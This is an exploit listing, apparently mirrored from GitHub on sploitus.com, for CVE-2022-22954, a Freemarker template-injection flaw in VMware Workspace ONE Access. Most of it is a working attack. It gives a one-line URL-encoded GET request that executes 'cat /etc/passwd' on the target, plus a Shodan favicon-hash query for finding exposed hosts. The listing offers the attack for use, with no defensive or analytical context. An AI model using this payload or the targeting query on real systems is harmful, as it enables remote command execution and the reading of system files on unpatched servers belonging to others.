Share
## https://sploitus.com/exploit?id=CB8E07F4-50D7-541D-8B3E-749FACA903E3
# VMware-CVE-2022-22954

# VMware CVE-2022-22954 Workspace ONE Access Freemarker 服务器端模板注入

POC for Vmware CVE-2022-22954

Use this one line GET request!! This will execute cat /etc/passwd

{host}/catalog-portal/ui/oauth/verify?error=&deviceUdid=%24%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%22%29%7d

Shodan Query: http.favicon.hash:-1250474341


## use python3 exp url
--- 

<img width="872" alt="image" src="https://user-images.githubusercontent.com/59011386/162896235-1142d323-76df-43ba-a784-6346e1b8bb3f.png">